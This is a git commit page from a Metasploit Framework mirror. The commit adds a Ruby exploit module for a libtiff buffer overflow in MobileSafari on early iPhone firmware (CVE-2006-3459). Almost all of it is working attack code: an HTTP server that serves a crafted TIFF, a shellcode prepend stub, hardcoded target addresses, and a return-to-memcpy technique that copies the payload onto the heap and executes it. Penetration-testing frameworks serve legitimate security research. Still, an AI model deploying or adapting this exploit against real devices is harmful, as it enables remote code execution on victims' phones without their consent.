infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

First version of the iPhone libtiff exploit 

git-svn-id: file:///home/svn/framework3/trunk@5144 4d416f70-5f16-0410-b530-b9f4589650da
unstable
HD Moore 2007-10-14 22:15:41 +00:00
parent 21d971139b
commit 41088c3ea4
2 changed files with 140 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

BIN
data/exploits/iphone_libtiff.bin Normal file
View File

Binary file not shown.

140
modules/exploits/osx/armle/safari_libtiff.rb Normal file
View File

@ -0,0 +1,140 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##
require 'msf/core'
module Msf
class Exploits::Osx::Armle::SafariLibTIFF < Msf::Exploit::Remote
#
# This module acts as an HTTP server
#
include Exploit::Remote::HttpServer::HTML
def initialize(info = {})
super(update_info(info,
'Name' => 'iPhone MobileSafari LibTIFF Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow in the version of
libtiff shipped with firmware versions 1.00, 1.01, 1.02, and
1.1.1 of the Apple iPhone. iPhones which have not had the BSD
tools installed will need to use a special payload.
},
'License' => MSF_LICENSE,
'Author' => ['hdm'],
'Version' => '$Revision$',
'References' =>
[
['CVE', '2006-3459'],
['OSVDB', '27723'],
['BID', '19283']
],
'Payload' =>
{
'Space' => 300,
'BadChars' => "",
# Multi-threaded applications are not allowed to execve() on OS X
# This stub injects a vfork/exit in front of the payload
'Prepend' =>
[
0xe3a0c042, # vfork
0xef000080, # sc
0xe3500000, # cmp r0, #0
0x1a000001, # bne
0xe3a0c001, # exit(0)
0xef000080 # sc
].pack("V*")
},
'Targets' =>
[
[ 'MobileSafari iPhone Mac OS X armle (1.00, 1.02)',
{
'Platform' => 'osx',
'Arch' => ARCH_ARMLE,
'Stack' => 0x0055a5bc,
'Heap' => 0x0006b400,
'Memcpy' => 0x3009a1bc,
}
],
],
'DisclosureDate' => 'Aug 01 2006'
))
end
def on_request_uri(cli, request)
# Re-generate the payload
return if ((p = regenerate_payload(cli)) == nil)
print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")
# Transmit the compressed response to the client
send_response(cli, generate_tiff(p), { 'Content-Type' => 'image/tiff' })
# Handle the payload
handler(cli)
end
def generate_tiff(code)
path = File.join(Msf::Config.install_root, "data", "exploits", "iphone_libtiff.bin")
print_status("Opening file...")
data = File.read(path, File.size(path))
print_status("Done...")
#
# The basic idea:
#
# Overwrite return address with: ldmia sp!, {r0, r1, r2, r3, pc}
# This loads r0-r3 and pc from the stack, jumping to the address in pc
# The address in pc is the real address of memcpy(), which takes
# parameters via the r0-r3 registers. We memcpy the stack address
# (which seems to be static across all versions) to an unused page
# on the heap. Finally, we patch up a local variable (r6) and then
# return back to the heap location we copied the stack to.
#
dst_ptr = target['Heap']
src_ptr = target['Stack']
shl_len = 168 + payload.encoded.length
# Still some wonky characters in here, this doesn't work with alpha/english/etc
patt = pattern_create(shl_len)
# 300df800 e8bd800f ldmia sp!, {r0, r1, r2, r3, pc}
patt[120,4] = [0x300df800].pack("V")
# memcpy(r0, r1, r2)
patt[140,4] = [target['Memcpy']].pack("V") # memcpy @ 0x3009a1bc
patt[124,4] = [dst_ptr].pack("V") # dst
patt[128,4] = [src_ptr].pack("V") # src
patt[132,4] = [shl_len].pack("V") # len
# fix up r6 to bypass an exception
patt[112,4] = [dst_ptr + shl_len].pack("V")
# Return back to our copied stack data
patt[164,4] = [dst_ptr + 168].pack("V")
# Stick our shellcode into the buffer
patt[168, payload.encoded.length] = payload.encoded
data << patt
data
end
end
end